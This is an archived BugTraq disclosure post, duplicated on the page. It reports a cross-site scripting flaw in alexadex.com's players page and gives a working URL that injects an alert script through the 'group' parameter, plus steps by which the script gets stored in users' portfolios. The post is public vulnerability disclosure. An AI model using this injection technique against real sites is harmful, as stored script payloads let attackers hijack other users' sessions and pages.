BugTraq
Back to list
|
Post reply
Alexadex.com players.py XSS Exploit
May 05 2006 08:10AM
skinnypuppy hushmail ai
+++++++++++++++++++++++++++++++++++++
|Alexadex.com players.py XSS Exploit|
+++++++++++++++++++++++++++++++++++++
May 04,2006
++++++++++++++++++++++++++++++++
|XSS Exploition on alexadex.com|
++++++++++++++++++++++++++++++++
http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPUPPY");</
script>
What this will do is add a group with the name: <script>alert("SKINNYPUPPY");</script>
When you click the "Join this group" it sets the injected code to your Portfolio and when viewed it executes the injected code.
++++++++++++++++++++++++++++++++
EMAIL: skinnypuppy (at) hush (dot) ai [email concealed]
demo: http://www.alexadex.com/ad/user/xss
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
|Alexadex.com players.py XSS Exploit|
+++++++++++++++++++++++++++++++++++++
May 04,2006
++++++++++++++++++++++++++++++++
|XSS Exploition on alexadex.com|
++++++++++++++++++++++++++++++++
http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPUPPY");</
script>
What this will do is add a group with the name: <script>alert("SKINNYPUPPY");</script>
When you click the "Join this group" it sets the injected code to your Portfolio and when viewed it executes the injected code.
++++++++++++++++++++++++++++++++
EMAIL: skinnypuppy (at) hush (dot) ai [email concealed]
demo: http://www.alexadex.com/ad/user/xss
[ reply ]